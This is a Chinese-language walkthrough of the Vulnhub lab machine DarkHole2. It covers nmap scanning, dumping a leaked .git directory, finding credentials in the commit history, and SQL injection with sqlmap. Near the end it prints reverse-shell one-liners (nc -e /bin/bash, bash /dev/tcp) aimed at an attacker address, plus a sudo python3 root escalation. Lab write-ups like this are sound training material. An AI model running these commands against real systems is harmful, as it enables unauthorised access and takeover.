VULHUB靶机 DARKHOLE2

题目描述

desc.png

官方链接

知识点

• git泄露
• 记得查看history
• sudo提权
• sql注入（手工或者sqlmap）

解题记录

准备

攻击机：KALI 192.168.1.1

靶机：DARKHOLE2 192.168.1.28/

解题

访问靶机

desc.png

使用nmap进行扫描，发现开启了22和80端口，同时发现git文件泄露

nmap -Pn -n -sS -A 192.168.1.28

11.png

直接访问http://192.168.1.28/.git/

git.png

git泄露工作主要有以下几个，其中比较好用的还是git-dumper和GitHacker。

GitHacker Github Link

git-dumper Github Link

compare.png

使用git-dumper下载源码进行审计

git-dumper http://192.168.1.28/.git/ webb

接下来还是常规套路走一波，爆破路径

dirb http://192.168.1.28

dirb.png

发现刚才的git路径和login页面

login2.png

查看git下载的文件夹ls -al

ls.png

分别查看这几个页面

login1.png

可以看到mysql的用户名是root没有密码，数据库是darkhole_2

config.png

logout.php中没有太多重要信息

logout.png

尝试查看git log记录，看到有一个commit是增加了安全性，可以查看修改前的文件

diff.png log.png

git checkout 

checkout.png

继续查看login.php可以看到明文用户名和密码，其实这种情况很常见，在开发前期为了方便是会把重要信息直接写在文件中的。

login3.png

email: lush@admin.com
password: 321

使用该账户密码登陆

dashb.png

使用sqlmap爆破

sqlmap-db.png

爆破表名

sqlmap-tables.png

dump两个表的数据

ssh-tables.png tables-users.png

使用ssh登陆

ssh-login.png

反弹shell

nc -e /bin/bash 192.168.0.4 7777
bash -i >& /dev/tcp/ip/port 0>&1

rv_shell.png losy-flag.png

查看历史

losy-history.png

sudo -l提权

sudo-python3.png

sudo python3 -c 'import os; os.system("/bin/sh")'

get-root.png